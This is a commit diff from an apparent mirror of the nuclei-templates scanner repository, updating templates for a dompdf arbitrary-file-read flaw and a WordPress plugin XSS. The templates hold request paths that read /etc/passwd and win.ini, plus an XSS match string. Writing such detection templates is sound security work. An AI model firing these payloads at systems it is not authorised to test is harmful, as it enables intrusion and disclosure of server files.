daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

more updates

patch-1
sandeep 2021-09-21 15:46:26 +05:30
parent ff1537d7da
commit bcb594fc56
2 changed files with 7 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
cves/2014/CVE-2014-2383.yaml
View File

@ -1,14 +1,14 @@
id: arbitrary-file-read-in-dompdf
id: CVE-2014-2383
info:
name: Arbitrary file read in dompdf < v0.6.0
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/33004
tags: dompdf,lfi
# - "/dompdf.php?input_file=C:/windows/win.ini"
# - "/dompdf.php?input_file=/etc/passwd"
tags: cve,cve2014,dompdf,lfi
metadata:
win-payload: "/dompdf.php?input_file=C:/windows/win.ini"
unix-payload: "/dompdf.php?input_file=/etc/passwd"
requests:
- method: GET

5
cves/2014/CVE-2014-9094.yaml
View File

@ -4,9 +4,9 @@ info:
name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,2014,wordpress,xss,wp-plugin
description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter."
reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094
tags: cve,cve2014,wordpress,xss,wp-plugin
requests:
- method: GET
@ -18,7 +18,6 @@ requests:
- type: word
words:
- "<script>alert(1)</script>"
part: body
- type: word
part: header